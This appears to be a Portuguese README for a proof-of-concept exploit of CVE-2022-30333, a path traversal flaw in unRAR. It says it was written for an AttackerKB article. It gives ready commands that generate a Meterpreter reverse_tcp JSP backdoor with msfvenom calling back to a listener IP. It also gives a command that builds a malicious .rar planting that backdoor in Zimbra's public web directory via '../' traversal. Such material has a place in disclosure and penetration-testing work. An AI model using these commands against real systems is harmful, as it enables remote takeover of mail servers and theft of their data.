
Exploração de prova de conceito para travessia de caminho CVE-2022-30333 no unRAR, gerando arquivos .rar maliciosos para plantar payloads em locais arbitrários. Integra-se com Metasploit e msfvenom para teste de penetração.
Uma prova de conceito para o CVE-2022-30333 - uma vulnerabilidade de path traversal no unRAR anterior à versão 6.11. Criei isto como uma demonstração do exploit para um artigo no AttackerKB, e espero incorporá-lo em um Módulo Metasploit em breve!
Basicamente, você fornece um alvo (incluindo path traversal) e alguns dados de arquivo, e esta ferramenta gerará um .rar que extrairá esse arquivo para esse local. O comprimento máximo do arquivo é de 104 bytes, e o comprimento máximo do arquivo é de 4096 bytes. (Isso não é intrínseco à vulnerabilidade, é apenas o que escolhi quando geri o arquivo).
Por exemplo, gere uma backdoor com msfvenom:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
Depois crie um arquivo .rar, plantando o .jsp em algum lugar interessante:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar